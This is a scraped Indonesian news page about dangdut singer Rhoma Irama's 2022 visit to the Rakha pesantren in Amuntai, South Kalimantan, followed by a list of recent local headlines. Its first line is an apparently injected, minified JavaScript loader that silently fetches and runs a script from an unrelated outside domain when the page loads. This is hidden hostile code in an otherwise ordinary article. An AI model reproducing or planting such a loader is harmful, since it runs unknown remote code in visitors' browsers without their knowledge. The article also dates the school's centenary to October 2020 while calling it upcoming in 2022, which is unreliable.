(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Bang Haji Disambut Santri di Ponpes Rakha Amuntai


KANALKALIMANTAN.COM, AMUNTAI – Ribuan santri menyambut kedatangan H Rhoma Irama bersama rombongan dalam kunjungan silaturahmi di Pondok Pesantren Rasyidah Khalidiyah (Rakha) Amuntai, Sabtu (27/8/2022) siang.

Didampingi Ketua DPRD Kalimantan Selatan H Supian HK, dalam kunjungannya tersebut Bang Haji -sapaan akrabnya, menyapa ribuan santri serta warga sekitar yang tampak ingin melihat langsung sosok Raja Dangdut tersebut.

Bang Haji mengaku bersyukur dapat mengunjungi salah satu Ponpes yang pernah diasuh oleh Pahlawan Nasional Dr KH Idham Chalid.

“Saya tertarik, karena KH Idham Chalid adalah salah satu guru saya, guru agama, guru politik, guru tata negara dan sebagainya,” ungkap Bang Haji mengemukakan alasannya mengunjungi salah satu Ponpes tertua di Kalimantan ini.

 

Baca juga  : PLN Operasikan PLTMG Bangkanai 140 MW Guna Perkuat Kelistrikan Kalimantan  

Ia berpesan kepada para santri mempersiapkan diri dengan sebaik-baiknya karena keberlangsungan negara berada di pundak generasi muda.

Dirinya juga berpesan kepada para santri agar dapat meningkatkan keimanan ketakwaan serta akhlak.

“Saya ingatkan, sebagai anak bangsa para santri diharapkan dapat menjadi tameng keteguhan nilai-nilai Pancasila dalam kehidupan sehari-hari, berbangsa dan bernegara,” ucapnya.

Selain itu, Bang Haji juga mengucapkan selamat milad untuk Ponpes Rakha yang bakal mencapai usia satu abad atau 100 tahun pada 13 Oktober 2020 mendatang.

 

Baca juga : Rumah Ambruk Kembali Terjadi di Banjarmasin

“Semoga dari pesantren Rakha ini, terus melahirkan ulama-ulama yang betul-betul bertanggung jawab kepada agama, bangsa dan negara.Aamiin,” pungkasnya.

Disamping kunjungan ke Ponpes Rakha Amuntai, Bang Haji ke Kabupaten Hulu Sungai Utara (HSU) kali ini juga dalam rangka konser “Nada dan Dakwah” yang dijadwalkan pada 27 Agustus 2022 malam, di Kecamatan Danau Panggang.(Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

5 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

7 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

8 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

8 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

11 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

12 jam ago

This website uses cookies.